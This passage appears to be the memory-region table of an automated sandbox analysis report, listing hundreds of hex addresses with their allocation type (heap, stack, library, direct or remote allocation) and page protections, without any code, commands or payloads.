||
|
7FFAAC15B000
|
trusted library allocation
|
page read and write
|
||
|
709B000
|
heap
|
page read and write
|
||
|
71D0000
|
trusted library allocation
|
page read and write
|
||
|
1FF26CC0000
|
heap
|
page read and write
|
||
|
6EB0000
|
direct allocation
|
page read and write
|
||
|
256AD000
|
stack
|
page read and write
|
||
|
262CDD7E000
|
trusted library allocation
|
page read and write
|
||
|
24FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
24A4C000
|
stack
|
page read and write
|
||
|
24FA0000
|
trusted library allocation
|
page read and write
|
||
|
262E458C000
|
heap
|
page read and write
|
||
|
262CBE80000
|
trusted library allocation
|
page read and write
|
||
|
46F1000
|
trusted library allocation
|
page read and write
|
||
|
80680BE000
|
stack
|
page read and write
|
||
|
2EE4000
|
trusted library allocation
|
page read and write
|
||
|
1CB082E1000
|
heap
|
page read and write
|
||
|
22640000
|
remote allocation
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
1CB08418000
|
heap
|
page read and write
|
||
|
8067B7D000
|
stack
|
page read and write
|
||
|
2283E000
|
stack
|
page read and write
|
||
|
24F87000
|
trusted library allocation
|
page read and write
|
||
|
6EBF0000
|
unkown
|
page readonly
|
||
|
262CA541000
|
heap
|
page read and write
|
||
|
22730000
|
trusted library allocation
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
84A0000
|
direct allocation
|
page read and write
|
||
|
6F8E000
|
heap
|
page read and write
|
||
|
258EE000
|
stack
|
page read and write
|
||
|
7140000
|
heap
|
page execute and read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
2499E000
|
trusted library allocation
|
page read and write
|
||
|
262CDD58000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
22850000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC360000
|
trusted library allocation
|
page read and write
|
||
|
262CC428000
|
trusted library allocation
|
page read and write
|
||
|
23871000
|
trusted library allocation
|
page read and write
|
||
|
7054000
|
heap
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
6F6A000
|
heap
|
page read and write
|
||
|
6C6E000
|
stack
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
1CB08451000
|
heap
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
1CB082E1000
|
heap
|
page read and write
|
||
|
2B3D000
|
stack
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
1CB08463000
|
heap
|
page read and write
|
||
|
249AE000
|
trusted library allocation
|
page read and write
|
||
|
2A34000
|
trusted library allocation
|
page read and write
|
||
|
2FDD000
|
stack
|
page read and write
|
||
|
1CB0665F000
|
heap
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
262CC858000
|
trusted library allocation
|
page read and write
|
||
|
224AE000
|
stack
|
page read and write
|
||
|
249A2000
|
trusted library allocation
|
page read and write
|
||
|
4FA9000
|
remote allocation
|
page execute and read and write
|
||
|
24BBE000
|
stack
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
70D8000
|
heap
|
page read and write
|
||
|
1CB08409000
|
heap
|
page read and write
|
||
|
6F1F000
|
stack
|
page read and write
|
||
|
2988000
|
heap
|
page read and write
|
||
|
6EDE000
|
stack
|
page read and write
|
||
|
24B25000
|
heap
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
46E0000
|
heap
|
page execute and read and write
|
||
|
7390000
|
trusted library allocation
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
238D0000
|
trusted library allocation
|
page read and write
|
||
|
262CBEE0000
|
heap
|
page read and write
|
||
|
290E000
|
stack
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
446E000
|
stack
|
page read and write
|
||
|
5750000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D8000
|
heap
|
page read and write
|
||
|
24A70000
|
heap
|
page read and write
|
||
|
8067DBF000
|
stack
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
262CDFE7000
|
trusted library allocation
|
page read and write
|
||
|
6EBF1000
|
unkown
|
page execute read
|
||
|
2A80000
|
trusted library allocation
|
page read and write
|
||
|
24B4C000
|
heap
|
page read and write
|
||
|
24FB6000
|
trusted library allocation
|
page read and write
|
||
|
262CDDE9000
|
trusted library allocation
|
page read and write
|
||
|
24FE0000
|
trusted library allocation
|
page read and write
|
||
|
1CB0858F000
|
heap
|
page read and write
|
||
|
1CB088D8000
|
heap
|
page read and write
|
||
|
262CC65E000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D8000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
6EC0D000
|
unkown
|
page read and write
|
||
|
7FFAAC1FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC2F1000
|
trusted library allocation
|
page read and write
|
||
|
257AE000
|
stack
|
page read and write
|
||
|
44F0000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
6EC06000
|
unkown
|
page readonly
|
||
|
6FBE000
|
heap
|
page read and write
|
||
|
262CC828000
|
trusted library allocation
|
page read and write
|
||
|
6ED0000
|
direct allocation
|
page read and write
|
||
|
2242E000
|
stack
|
page read and write
|
||
|
22750000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
7FFB22710000
|
unkown
|
page read and write
|
||
|
45FE000
|
stack
|
page read and write
|
||
|
262CC7EE000
|
trusted library allocation
|
page read and write
|
||
|
839D000
|
stack
|
page read and write
|
||
|
262CC449000
|
trusted library allocation
|
page read and write
|
||
|
24F7D000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page read and write
|
||
|
71A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC490000
|
trusted library allocation
|
page read and write
|
||
|
338F000
|
stack
|
page read and write
|
||
|
6D978FF000
|
unkown
|
page read and write
|
||
|
7FFAAC400000
|
trusted library allocation
|
page read and write
|
||
|
1CB06661000
|
heap
|
page read and write
|
||
|
24B23000
|
heap
|
page read and write
|
||
|
228D8000
|
trusted library allocation
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
262E3F70000
|
trusted library allocation
|
page read and write
|
||
|
24AB8000
|
heap
|
page read and write
|
||
|
7F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
24A84000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
2255F000
|
stack
|
page read and write
|
||
|
262E451A000
|
heap
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
8470000
|
direct allocation
|
page read and write
|
||
|
1CB088D8000
|
heap
|
page read and write
|
||
|
2B4D000
|
heap
|
page read and write
|
||
|
7FFAAC390000
|
trusted library allocation
|
page read and write
|
||
|
2A49000
|
trusted library allocation
|
page read and write
|
||
|
72FD000
|
stack
|
page read and write
|
||
|
6EC0F000
|
unkown
|
page readonly
|
||
|
262CC564000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
1CB08443000
|
heap
|
page read and write
|
||
|
262CA430000
|
heap
|
page read and write
|
||
|
8067E37000
|
stack
|
page read and write
|
||
|
1FF26CD0000
|
heap
|
page read and write
|
||
|
7FFAAC340000
|
trusted library allocation
|
page read and write
|
||
|
1CB0660B000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
262CC425000
|
trusted library allocation
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3D0000
|
trusted library allocation
|
page read and write
|
||
|
7EB0000
|
trusted library allocation
|
page read and write
|
||
|
262E4500000
|
heap
|
page execute and read and write
|
||
|
25000000
|
trusted library allocation
|
page read and write
|
||
|
24FE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC260000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
24FA0000
|
trusted library allocation
|
page read and write
|
||
|
7067000
|
heap
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
262DBF71000
|
trusted library allocation
|
page read and write
|
||
|
457E000
|
stack
|
page read and write
|
||
|
223EE000
|
stack
|
page read and write
|
||
|
4846000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
84C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7150000
|
trusted library allocation
|
page read and write
|
||
|
2566D000
|
stack
|
page read and write
|
||
|
7FFAAC3F0000
|
trusted library allocation
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
7F1D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
8067EB8000
|
stack
|
page read and write
|
||
|
7106000
|
heap
|
page read and write
|
||
|
1CB08418000
|
heap
|
page read and write
|
||
|
8540000
|
direct allocation
|
page read and write
|
||
|
463E000
|
stack
|
page read and write
|
||
|
262CC7B1000
|
trusted library allocation
|
page read and write
|
||
|
224D0000
|
trusted library allocation
|
page read and write
|
||
|
319C000
|
heap
|
page read and write
|
||
|
8460000
|
direct allocation
|
page read and write
|
||
|
1CB08458000
|
heap
|
page read and write
|
||
|
45BE000
|
stack
|
page read and write
|
||
|
7050000
|
direct allocation
|
page read and write
|
||
|
2B41000
|
heap
|
page read and write
|
||
|
262CA4FE000
|
heap
|
page read and write
|
||
|
24FA0000
|
trusted library allocation
|
page read and write
|
||
|
2A65000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F17000
|
trusted library allocation
|
page execute and read and write
|
||
|
262E44D0000
|
heap
|
page execute and read and write
|
||
|
806803E000
|
stack
|
page read and write
|
||
|
8520000
|
direct allocation
|
page read and write
|
||
|
1CB065EF000
|
heap
|
page read and write
|
||
|
2259D000
|
stack
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
25020000
|
trusted library allocation
|
page read and write
|
||
|
809B000
|
stack
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
7EE50000
|
trusted library allocation
|
page execute and read and write
|
||
|
70F1000
|
heap
|
page read and write
|
||
|
262E45C6000
|
heap
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
844E000
|
stack
|
page read and write
|
||
|
2272A000
|
stack
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC410000
|
trusted library allocation
|
page read and write
|
||
|
6D979FF000
|
stack
|
page read and write
|
||
|
24996000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC143000
|
trusted library allocation
|
page execute and read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC420000
|
trusted library allocation
|
page read and write
|
||
|
2EF0000
|
trusted library allocation
|
page read and write
|
||
|
22740000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
44F8000
|
heap
|
page read and write
|
||
|
262CA53C000
|
heap
|
page read and write
|
||
|
24FCE000
|
stack
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
7E90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
6F63000
|
heap
|
page read and write
|
||
|
2B1C000
|
heap
|
page read and write
|
||
|
2F1B000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D975BD000
|
stack
|
page read and write
|
||
|
4E9D000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
24EEE000
|
stack
|
page read and write
|
||
|
7180000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
262CA6D5000
|
heap
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
2BBA000
|
heap
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
25950000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
6F33000
|
heap
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
1CB083E1000
|
heap
|
page read and write
|
||
|
262CBF40000
|
heap
|
page execute and read and write
|
||
|
8161000
|
heap
|
page read and write
|
||
|
1CB08435000
|
heap
|
page read and write
|
||
|
262CDD7A000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
25010000
|
trusted library allocation
|
page read and write
|
||
|
6E5E000
|
stack
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
4E9B000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
1CB082E1000
|
heap
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3A0000
|
trusted library allocation
|
page read and write
|
||
|
262E4633000
|
heap
|
page read and write
|
||
|
7FFAAC330000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB08435000
|
heap
|
page read and write
|
||
|
1CB088D8000
|
heap
|
page read and write
|
||
|
22850000
|
heap
|
page read and write
|
||
|
1CB06808000
|
heap
|
page read and write
|
||
|
7E3D000
|
stack
|
page read and write
|
||
|
1CB08303000
|
heap
|
page read and write
|
||
|
226D0000
|
direct allocation
|
page read and write
|
||
|
80681BB000
|
stack
|
page read and write
|
||
|
262E47A2000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
262DC262000
|
trusted library allocation
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
22840000
|
trusted library allocation
|
page read and write
|
||
|
25940000
|
trusted library allocation
|
page read and write
|
||
|
225DD000
|
stack
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page read and write
|
||
|
6EA0000
|
direct allocation
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
818A000
|
heap
|
page read and write
|
||
|
262E3FE6000
|
heap
|
page read and write
|
||
|
1CB08443000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
2A3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
8500000
|
direct allocation
|
page read and write
|
||
|
4EB3000
|
trusted library allocation
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
24FF0000
|
trusted library allocation
|
page read and write
|
||
|
262CC84D000
|
trusted library allocation
|
page read and write
|
||
|
24C20000
|
heap
|
page execute and read and write
|
||
|
2EFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
2A40000
|
trusted library allocation
|
page read and write
|
||
|
6E8E000
|
stack
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
262CA6D0000
|
heap
|
page read and write
|
||
|
2F15000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
2251E000
|
stack
|
page read and write
|
||
|
25020000
|
trusted library allocation
|
page read and write
|
||
|
24B28000
|
heap
|
page read and write
|
||
|
6F63000
|
heap
|
page read and write
|
||
|
24878000
|
trusted library allocation
|
page read and write
|
||
|
1CB08307000
|
heap
|
page read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
442C000
|
stack
|
page read and write
|
||
|
2A60000
|
trusted library allocation
|
page read and write
|
||
|
2267E000
|
stack
|
page read and write
|
||
|
2A10000
|
trusted library allocation
|
page read and write
|
||
|
262CC804000
|
trusted library allocation
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
1CB08308000
|
heap
|
page read and write
|
||
|
25010000
|
trusted library allocation
|
page read and write
|
||
|
24FC000
|
stack
|
page read and write
|
||
|
7DF408EC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6EBF1000
|
unkown
|
page execute read
|
||
|
262E456A000
|
heap
|
page read and write
|
||
|
2F0A000
|
trusted library allocation
|
page execute and read and write
|
||
|
835E000
|
stack
|
page read and write
|
||
|
256C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC430000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
6EF0000
|
heap
|
page read and write
|
||
|
706C000
|
heap
|
page read and write
|
||
|
24FB0000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D8000
|
heap
|
page read and write
|
||
|
22850000
|
trusted library allocation
|
page read and write
|
||
|
24F91000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D8000
|
heap
|
page read and write
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
25010000
|
trusted library allocation
|
page read and write
|
||
|
A0C9000
|
direct allocation
|
page execute and read and write
|
||
|
884E000
|
stack
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
2A30000
|
trusted library allocation
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page read and write
|
||
|
1FF26AB0000
|
heap
|
page read and write
|
||
|
24A90000
|
heap
|
page read and write
|
||
|
262CDDED000
|
trusted library allocation
|
page read and write
|
||
|
2538000
|
stack
|
page read and write
|
||
|
7FFAAC4B0000
|
trusted library allocation
|
page read and write
|
||
|
6BED000
|
stack
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
7ED0000
|
heap
|
page read and write
|
||
|
1CB065DB000
|
heap
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
253D000
|
stack
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
24C30000
|
heap
|
page read and write
|
||
|
24F2E000
|
stack
|
page read and write
|
||
|
2A5A000
|
trusted library allocation
|
page execute and read and write
|
||
|
25000000
|
trusted library allocation
|
page read and write
|
||
|
8068B8E000
|
stack
|
page read and write
|
||
|
1CB085C7000
|
heap
|
page read and write
|
||
|
1CB0842F000
|
heap
|
page read and write
|
||
|
6E45000
|
heap
|
page read and write
|
||
|
29F0000
|
trusted library section
|
page read and write
|
||
|
2B0E000
|
stack
|
page read and write
|
||
|
8067753000
|
stack
|
page read and write
|
||
|
7FFAAC226000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC14D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB22712000
|
unkown
|
page readonly
|
||
|
4660000
|
heap
|
page execute and read and write
|
||
|
6FBE000
|
heap
|
page read and write
|
||
|
262CDCF4000
|
trusted library allocation
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
24F83000
|
trusted library allocation
|
page read and write
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
262E4514000
|
heap
|
page read and write
|
||
|
2EE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB22706000
|
unkown
|
page readonly
|
||
|
24990000
|
trusted library allocation
|
page read and write
|
||
|
1CB0665F000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
8120000
|
heap
|
page read and write
|
||
|
1CB06632000
|
heap
|
page read and write
|
||
|
262CBF67000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
806813E000
|
stack
|
page read and write
|
||
|
2A62000
|
trusted library allocation
|
page read and write
|
||
|
7D97000
|
stack
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
262CD258000
|
trusted library allocation
|
page read and write
|
||
|
1CB06808000
|
heap
|
page read and write
|
||
|
6F66000
|
heap
|
page read and write
|
||
|
262CBE90000
|
heap
|
page readonly
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
723E000
|
stack
|
page read and write
|
||
|
6F63000
|
heap
|
page read and write
|
||
|
1FF26B00000
|
heap
|
page read and write
|
||
|
25010000
|
trusted library allocation
|
page read and write
|
||
|
8067A7F000
|
stack
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
24B46000
|
heap
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
24FA0000
|
trusted library allocation
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
24FBE000
|
trusted library allocation
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
24FC0000
|
trusted library allocation
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page read and write
|
||
|
22760000
|
heap
|
page read and write
|
||
|
6EBF0000
|
unkown
|
page readonly
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
24C31000
|
heap
|
page read and write
|
||
|
7FFAAC142000
|
trusted library allocation
|
page read and write
|
||
|
1CB0842F000
|
heap
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
2A2A000
|
heap
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
2246D000
|
stack
|
page read and write
|
||
|
249B1000
|
trusted library allocation
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
7190000
|
trusted library allocation
|
page read and write
|
||
|
262DC253000
|
trusted library allocation
|
page read and write
|
||
|
6C2A000
|
stack
|
page read and write
|
||
|
6F8E000
|
heap
|
page read and write
|
||
|
2980000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
25960000
|
trusted library allocation
|
page execute and read and write
|
||
|
2EE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
262CA4B0000
|
heap
|
page read and write
|
||
|
24FE0000
|
trusted library allocation
|
page read and write
|
||
|
1CB082FC000
|
heap
|
page read and write
|
||
|
24AF6000
|
heap
|
page read and write
|
||
|
24BFB000
|
stack
|
page read and write
|
||
|
6BAA000
|
stack
|
page read and write
|
||
|
24994000
|
trusted library allocation
|
page read and write
|
||
|
84B0000
|
direct allocation
|
page read and write
|
||
|
6FB3000
|
heap
|
page read and write
|
||
|
8067C7E000
|
stack
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
2F12000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
63A9000
|
remote allocation
|
page execute and read and write
|
||
|
8B80000
|
direct allocation
|
page execute and read and write
|
||
|
25010000
|
trusted library allocation
|
page read and write
|
||
|
1CB08443000
|
heap
|
page read and write
|
||
|
262CBF65000
|
heap
|
page read and write
|
||
|
24FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F51000
|
heap
|
page read and write
|
||
|
840E000
|
stack
|
page read and write
|
||
|
7FFB226F0000
|
unkown
|
page readonly
|
||
|
453E000
|
stack
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
84E0000
|
direct allocation
|
page read and write
|
||
|
7FFB226F1000
|
unkown
|
page execute read
|
||
|
262DBF80000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
262CC720000
|
trusted library allocation
|
page read and write
|
||
|
702E000
|
stack
|
page read and write
|
||
|
7FFAAC370000
|
trusted library allocation
|
page read and write
|
||
|
24FE0000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
6FAE000
|
heap
|
page read and write
|
||
|
7FFAAC450000
|
trusted library allocation
|
page read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
8068D0B000
|
stack
|
page read and write
|
||
|
6F8E000
|
heap
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page read and write
|
||
|
25010000
|
trusted library allocation
|
page read and write
|
||
|
25940000
|
trusted library allocation
|
page read and write
|
||
|
7160000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB08721000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
4480000
|
trusted library allocation
|
page read and write
|
||
|
21F80000
|
direct allocation
|
page read and write
|
||
|
71E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC1F0000
|
trusted library allocation
|
page read and write
|
||
|
262E4507000
|
heap
|
page execute and read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
83A0000
|
trusted library allocation
|
page read and write
|
||
|
1CB082F0000
|
heap
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
262CDD91000
|
trusted library allocation
|
page read and write
|
||
|
8068C8B000
|
stack
|
page read and write
|
||
|
256B0000
|
trusted library allocation
|
page read and write
|
||
|
6E9E000
|
stack
|
page read and write
|
||
|
257EE000
|
stack
|
page read and write
|
||
|
262CDD6B000
|
trusted library allocation
|
page read and write
|
||
|
262CC3DE000
|
trusted library allocation
|
page read and write
|
||
|
2AA8000
|
trusted library allocation
|
page read and write
|
||
|
2A33000
|
trusted library allocation
|
page execute and read and write
|
||
|
8490000
|
direct allocation
|
page read and write
|
||
|
2F06000
|
trusted library allocation
|
page execute and read and write
|
||
|
80677DE000
|
stack
|
page read and write
|
||
|
8530000
|
direct allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
249BD000
|
trusted library allocation
|
page read and write
|
||
|
2EFD000
|
stack
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
7030000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
223AF000
|
stack
|
page read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
227F0000
|
heap
|
page read and write
|
||
|
22850000
|
trusted library allocation
|
page read and write
|
||
|
815D000
|
heap
|
page read and write
|
||
|
6E40000
|
heap
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
7FFAAC4A0000
|
trusted library allocation
|
page read and write
|
||
|
7F60000
|
trusted library allocation
|
page read and write
|
||
|
262E4610000
|
heap
|
page read and write
|
||
|
7FFAAC2E0000
|
trusted library allocation
|
page read and write
|
||
|
1CB08308000
|
heap
|
page read and write
|
||
|
25B0000
|
heap
|
page read and write
|
||
|
1FF26CC5000
|
heap
|
page read and write
|
||
|
22850000
|
trusted library allocation
|
page read and write
|
||
|
21F70000
|
direct allocation
|
page read and write
|
||
|
2592E000
|
stack
|
page read and write
|
||
|
2236E000
|
stack
|
page read and write
|
||
|
249B6000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
6FB0000
|
heap
|
page read and write
|
||
|
43EF000
|
stack
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
227EE000
|
stack
|
page read and write
|
||
|
1CB08308000
|
heap
|
page read and write
|
||
|
8140000
|
heap
|
page read and write
|
||
|
5719000
|
trusted library allocation
|
page read and write
|
||
|
262CC41C000
|
trusted library allocation
|
page read and write
|
||
|
294E000
|
stack
|
page read and write
|
||
|
1FF26B0B000
|
heap
|
page read and write
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
262CBEA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC150000
|
trusted library allocation
|
page read and write
|
||
|
262CA460000
|
heap
|
page read and write
|
||
|
8067CFE000
|
stack
|
page read and write
|
||
|
2498E000
|
stack
|
page read and write
|
||
|
24FE0000
|
trusted library allocation
|
page read and write
|
||
|
44DE000
|
stack
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
1CB084F0000
|
remote allocation
|
page read and write
|
||
|
8067F3B000
|
stack
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
1CB0680A000
|
heap
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
6EC0F000
|
unkown
|
page readonly
|
||
|
2A90000
|
heap
|
page readonly
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
24F92000
|
trusted library allocation
|
page read and write
|
||
|
4665000
|
heap
|
page execute and read and write
|
||
|
1CB0856A000
|
heap
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
24F90000
|
trusted library allocation
|
page read and write
|
||
|
1CB088D7000
|
heap
|
page read and write
|
||
|
24F70000
|
